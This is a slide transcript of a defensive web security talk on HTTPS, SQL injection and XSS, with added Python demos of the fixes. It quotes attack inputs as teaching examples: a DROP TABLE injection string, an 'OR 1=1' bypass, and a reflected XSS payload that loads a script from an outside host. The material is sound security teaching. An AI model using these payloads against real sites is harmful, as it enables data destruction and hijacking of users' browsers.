There Is No Silver Bullet (Español)
Harley Watson
November 29, 2014
Transcript
there is no silver bullet Henri Watson
What problems commonly affect web applications in the Dominican Republic?
A lack of HTTPS
Using HTTPS is not going to cost you your pica pollo for the day.
The current proposal for HTTP/2.0 mandates the use of TLS.
If you decide to use HTTPS, also use Strict-Transport-Security and ssllabs.com/ssltest
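The header the slide recommends, as an added example that is not code from the talk: a small Python checker for Strict-Transport-Security values, showing what "also use Strict-Transport-Security" means in practice. The 180-day threshold (the value ssllabs.com/ssltest treats as a long policy) and the three sample responses are assumptions of this example, not figures from the slides.

```python
import re

# Assumption (not from the talk): anything under 180 days counts as "short".
MIN_MAX_AGE_SECONDS = 180 * 24 * 60 * 60


def parse_hsts(value):
    """Parse a Strict-Transport-Security value per RFC 6797.

    Returns a dict of lower-cased directive names to values, with
    'max-age' converted to int, or None when the header is malformed
    (missing or non-numeric max-age, or a directive given twice).
    Browsers ignore a malformed STS header, so "almost right" equals absent.
    """
    directives = {}
    for token in value.split(";"):
        token = token.strip()
        if not token:
            continue
        name, _, raw = token.partition("=")
        name = name.strip().lower()
        raw = raw.strip().strip('"')
        if name in directives:      # RFC 6797 s6.1: each directive at most once
            return None
        directives[name] = raw
    if not re.fullmatch(r"\d+", directives.get("max-age", "")):
        return None
    directives["max-age"] = int(directives["max-age"])
    return directives


def hsts_findings(headers):
    """Audit the response headers of an HTTPS page for HSTS problems.

    `headers` is a plain dict as an HTTP client library returns; keys are
    matched case-insensitively. An empty list means the policy looks sound.
    """
    lowered = {k.lower(): v for k, v in headers.items()}
    value = lowered.get("strict-transport-security")
    if value is None:
        return ["missing: the first request to http:// can still be intercepted"]
    parsed = parse_hsts(value)
    if parsed is None:
        return ["malformed: browsers will ignore the header"]
    findings = []
    if parsed["max-age"] == 0:
        findings.append("max-age=0: this clears the policy instead of setting one")
    elif parsed["max-age"] < MIN_MAX_AGE_SECONDS:
        findings.append("max-age too short: the policy expires before the next visit")
    if "includesubdomains" not in parsed:
        findings.append("no includeSubDomains: subdomains may still be reached over http://")
    return findings


if __name__ == "__main__":
    # Constructed sample responses, not captured from any real site.
    samples = {
        "no header": {"Content-Type": "text/html"},
        "short": {"Strict-Transport-Security": "max-age=300"},
        "good": {"Strict-Transport-Security": "max-age=31536000; includeSubDomains; preload"},
    }
    for label, hdrs in samples.items():
        print(label, "->", hsts_findings(hdrs) or "OK")
```

Run it against the headers of your own site once the certificate is in place; a policy that passes here still deserves the ssllabs.com/ssltest run the slide asks for, since that test also covers the TLS configuration itself.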
SQL injection
Client request to the server:
GET /rastreador?orden=12345"; DROP TABLE ordenes;--
Web server request to the database:
SELECT * FROM ordenes WHERE orden = "12345"; DROP TABLE ordenes;--" AND estado = "pendiente"
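The slide's request and query, reproduced as an added Python example that is not code from the talk, against an in-memory SQLite table named after the slide's `ordenes` table. The rows are constructed, single-quoted literals stand in for the slide's double quotes, and the concatenated query is shown next to its parameterised replacement. Beyond the slide's DROP TABLE payload it also shows a second payload, `x' OR 1=1 --`, whose effect can be observed directly: the comment marker discards the `estado = 'pendiente'` condition and every order is returned.

```python
import sqlite3


def build_db():
    """Constructed demo data; table and column names follow the slide."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE ordenes (orden TEXT PRIMARY KEY, estado TEXT NOT NULL);
        INSERT INTO ordenes VALUES ('12345', 'pendiente'),
                                   ('12346', 'enviado'),
                                   ('99999', 'pendiente');
    """)
    return conn


def render_vulnerable_sql(orden):
    """The slide's query, built by pasting the client's value into the SQL text.

    This is the string the web server would send to the database; with the
    slide's payload it contains a second statement, DROP TABLE ordenes.
    """
    return (f"SELECT orden, estado FROM ordenes "
            f"WHERE orden = '{orden}' AND estado = 'pendiente'")


def vulnerable_lookup(conn, orden):
    """Runs the concatenated query: the client controls the SQL, not just a value.

    sqlite3's execute() refuses more than one statement per call, so the
    DROP TABLE payload cannot be run through it here; drivers that allow
    stacked statements (e.g. MySQL with multi-statements enabled) would run it.
    """
    return conn.execute(render_vulnerable_sql(orden)).fetchall()


def safe_lookup(conn, orden):
    """Parameterised query: the driver sends the value separately from the SQL,
    so quotes, semicolons and comment markers in it are just characters."""
    return conn.execute(
        "SELECT orden, estado FROM ordenes WHERE orden = ? AND estado = 'pendiente'",
        (orden,),
    ).fetchall()


if __name__ == "__main__":
    conn = build_db()
    honest = "12345"
    # Same trick as the slide: close the literal, then comment out the rest of
    # the query, which drops the estado = 'pendiente' restriction on the way.
    bypass = "x' OR 1=1 --"
    # The slide's payload (single-quote form): look at the SQL it produces.
    drop = "12345'; DROP TABLE ordenes;--"
    print(render_vulnerable_sql(drop))
    print("vulnerable, honest input:", vulnerable_lookup(conn, honest))
    print("vulnerable, bypass input:", vulnerable_lookup(conn, bypass))
    print("parameterised, bypass:   ", safe_lookup(conn, bypass))
```

The fix is the `?` placeholder, not escaping: the same separation of code from data is what every mainstream driver offers (`%s` in psycopg2 and MySQLdb, `$1` in pgx), and an ORM uses it for you as long as you do not fall back to building strings yourself.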
Problems in handling authentication
Cross-Site Scripting (XSS)
Client request to the server:
GET /hola?nombre=<script src="http://malva.do/jajaxddd.js"></script>
Server response to the client:
¡Hola, <script src="http://malva.do/jajaxddd.js"></script>!
Content-Security-Policy
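The reflection from the XSS slide next to its fix, as an added Python example that is not code from the talk: the parameter is HTML-escaped before it is placed in the page, and the response carries the Content-Security-Policy header the previous slide names as a second layer. The policy value, the handler name and the response headers are assumptions of this example; the payload is the one on the slide.

```python
import html
from urllib.parse import parse_qs, quote

# The slide's payload, reused here as constructed test input.
PAYLOAD = '<script src="http://malva.do/jajaxddd.js"></script>'

# Assumption (not from the talk): a restrictive policy. 'self' allows only
# resources from the page's own origin, so a script from malva.do is refused
# by the browser even if escaping were forgotten somewhere in the app.
CSP = "default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'self'"


def greeting_unsafe(nombre):
    """What the slide's server does: reflects the parameter straight into HTML."""
    return f"¡Hola, {nombre}!"


def greeting_safe(nombre):
    """Escape for an HTML text context: & < > " ' become entities, so the
    browser displays the text and never parses a tag out of it."""
    return f"¡Hola, {html.escape(nombre, quote=True)}!"


def handle_hola(query_string):
    """Minimal handler for GET /hola?<query_string>; returns (headers, body).

    parse_qs undoes the percent-encoding a real request arrives with.
    """
    nombre = parse_qs(query_string, keep_blank_values=True).get("nombre", [""])[0]
    headers = {
        "Content-Type": "text/html; charset=utf-8",
        "Content-Security-Policy": CSP,
        # Keeps browsers from sniffing the body into some other content type.
        "X-Content-Type-Options": "nosniff",
    }
    return headers, greeting_safe(nombre)


if __name__ == "__main__":
    print(greeting_unsafe(PAYLOAD))   # the slide's response: the script tag survives
    print(greeting_safe(PAYLOAD))     # entities only; shown to the user as literal text
    print(handle_hola("nombre=" + quote(PAYLOAD)))
```

Escaping has to match the context the value lands in: `html.escape` is right for element text and quoted attributes, but a value placed inside a `<script>` block, a URL or a CSS rule needs that context's own encoding, which is why the CSP header is worth sending regardless.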
Exposure of sensitive data
Using Components with Known Vulnerabilities
Mailing Lists
• bugtraq http://www.securityfocus.com/archive/1
• debian-security-announce https://lists.debian.org/debian-security-announce/
• fulldisclosure http://nmap.org/mailman/listinfo/fulldisclosure
• [email protected] https://httpd.apache.org/lists.html#http-announce
• nginx-announce http://mailman.nginx.org/mailman/listinfo/nginx-announce
• php-announce http://php.net/mailing-lists.php
Customer Service
Why is there no "silver bullet"?
Information security is a constant investment.
Heartbleed
By putting your users' data at risk, you also put your reputation at risk.
Thank you! @henriwatson
[email protected]
https://henriwatson.com/talks/silverbullet